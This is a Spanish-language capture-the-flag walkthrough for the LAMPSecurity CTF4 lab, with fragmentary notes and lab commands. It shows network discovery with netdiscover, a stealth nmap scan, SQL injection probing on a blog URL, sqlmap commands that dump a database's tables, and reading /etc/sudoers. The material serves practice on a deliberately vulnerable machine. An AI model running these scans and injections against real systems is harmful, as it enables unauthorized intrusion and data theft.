Вы находитесь на странице: 1из 1

###################################################################################

####################################################
CHALLENGE # 1
Desafio LAMPSecurity CTF4, es un desafío tipo boot2root (Esta relacionado con
obtener acceso root)
(L=linux A=Apache M=MYSql P=PHP)
Para ver la versión de kali i linux.
#cat /etc/*-release

Revisar Host VIVOS


1.-Siempre comenzar verificando las direcciones ip de la red, que pueda ver la
máquina de KALI.
#netdiscover -i eth0 -r 192.168.10.0/24 (-i = Interfaz o tarjeta | -r = Rango de
IP.)

2.-Mapear la red para ver puertos abiertos.


#nmap -sS 192.168.10.* (-sS mapeo silencioso, sin levantar alertas)(* = escaneará
de la 1 a la 254)
-V = Versión de los servicios.
-A = Agresivo a profundidad (Devuelve la mayor cantidad de detalles)

-Una vez detectado el puerto y archivo de texto, para visualizar en el navegador,


obtenemos más pistas.
-Al asignar una comilla simple al final de alguna url, este arrojará que servicio
está ocupando.
Se inyecto una comilla y la aplicación al dar errores, significa que soporta
inyección sql 192.168.10.130/index.html?page=blog&title=Blog&id=2'
Con esto podemos aplicar inyecciónes automatizadas.

#sqlmap -u "http://192.168.10.130/index.html?page=blog&title=Blog&id=2" -p "id"


--dbms=MySQL --dbs (--dbs= Necesitamos saber que base de datos esta usando) (--
dbms = especifica motor)(-p =especifica el parámetro)(-u = Para poder asignar
direccion url y aplique la inyección de forma automatica)

#sqlmap -u "http://192.168.10.130/index.html?page=blog&title=Blog&id=2" -D ehks


--tables --dump (--tables --dump =Volcado de las tablas de la base de datos
especificada EHKS)(-D=Especifica que base de datos queremos revisar

Una vez que comenzamos a probar los distintos directorios de


192.168.10.130/robots.txt, en algún momento nos pedirá ingresar como administrador.

sudo cat /etc/sudoers = para saber como están relacionadas las cuentas.

Вам также может понравиться